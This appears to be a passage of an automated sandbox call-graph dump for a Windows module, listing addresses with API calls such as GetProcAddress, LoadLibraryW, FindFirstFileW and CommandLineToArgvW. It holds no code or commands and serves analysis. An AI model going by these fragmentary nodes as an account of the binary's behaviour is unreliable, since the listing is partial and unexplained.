3198->3205 3204 68b818a5 GetProcAddress 3199->3204 3201 68b866cc 2 API calls 3200->3201 3201->3195 3206 68b86645 2 API calls 3202->3206 3209 68b865c0 2 API calls 3203->3209 3207 68b866cc 2 API calls 3204->3207 3208 68b818d8 GetProcAddress 3205->3208 3210 68b817f4 3206->3210 3211 68b818c7 3207->3211 3212 68b866cc 2 API calls 3208->3212 3213 68b8190b GetProcAddress 3209->3213 3243 68b81780 _vsnwprintf 3210->3243 3211->3196 3212->3203 3214 68b866cc 2 API calls 3213->3214 3216 68b8192d 3214->3216 3226 68b81855 3216->3226 3217 68b8180f 3218 68b866cc 2 API calls 3217->3218 3219 68b81817 FindFirstFileW 3218->3219 3220 68b8183a 3219->3220 3221 68b8198c 3219->3221 3222 68b86645 2 API calls 3220->3222 3221->3122 3225 68b81846 3222->3225 3223 68b81960 wcscmp 3224 68b81941 FindNextFileW 3223->3224 3224->3226 3227 68b81973 3224->3227 3228 68b86645 2 API calls 3225->3228 3226->3223 3226->3224 3229 68b866cc 2 API calls 3227->3229 3228->3226 3230 68b8197b 3229->3230 3231 68b866cc 2 API calls 3230->3231 3232 68b81983 FindClose 3231->3232 3232->3221 3244 68b85790 GetProcessHeap HeapAlloc 3233->3244 3235 68b8666c 3235->3120 3237 68b866f7 3236->3237 3238 68b866d6 3236->3238 3237->3127 3245 68b857e2 GetProcessHeap HeapFree 3238->3245 3246 68b85790 GetProcessHeap HeapAlloc 3240->3246 3242 68b865e7 3242->3125 3243->3217 3244->3235 3245->3237 3246->3242 3286 68b87cbb 3247->3286 3250 68b856ab 3293 68b847ce 3250->3293 3251 68b856be 3338 68b8550d 3251->3338 3254 68b856b6 3254->3168 3256 68b847ce 90 API calls 3257 68b856d5 3256->3257 3257->3254 3259 68b87b5b 3258->3259 3260 68b87be5 3258->3260 3262 68b87b69 3259->3262 3272 68b87c0c 3259->3272 3261 68b86645 2 API calls 3260->3261 3263 68b87bf1 LoadLibraryW 3261->3263 3265 68b87c3f 3262->3265 3266 68b87b77 3262->3266 3267 68b866cc 2 API calls 3263->3267 3264 68b865c0 2 API calls 3268 68b87c1d GetProcAddress 3264->3268 3265->3262 3271 68b86645 2 API calls 3265->3271 3269 68b87c70 3266->3269 3270 68b87b85 GetCommandLineW CommandLineToArgvW 
3266->3270 3267->3272 3273 68b866cc 2 API calls 3268->3273 3276 68b865c0 2 API calls 3269->3276 3274 68b87cb1 3270->3274 3284 68b87bad 3270->3284 3275 68b87c50 LoadLibraryW 3271->3275 3272->3259 3272->3264 3273->3265 3274->3170 3279 68b866cc 2 API calls 3275->3279 3277 68b87c7c GetProcAddress 3276->3277 3280 68b866cc 2 API calls 3277->3280 3278 68b87ca8 LocalFree 3278->3274 3282 68b87c6b 3279->3282 3283 68b87c9e 3280->3283 3281 68b87bbd wcscmp 3281->3284 3285 68b87bdb 3281->3285 3282->3266 3283->3285 3284->3278 3284->3281 3284->3285 3285->3278 3287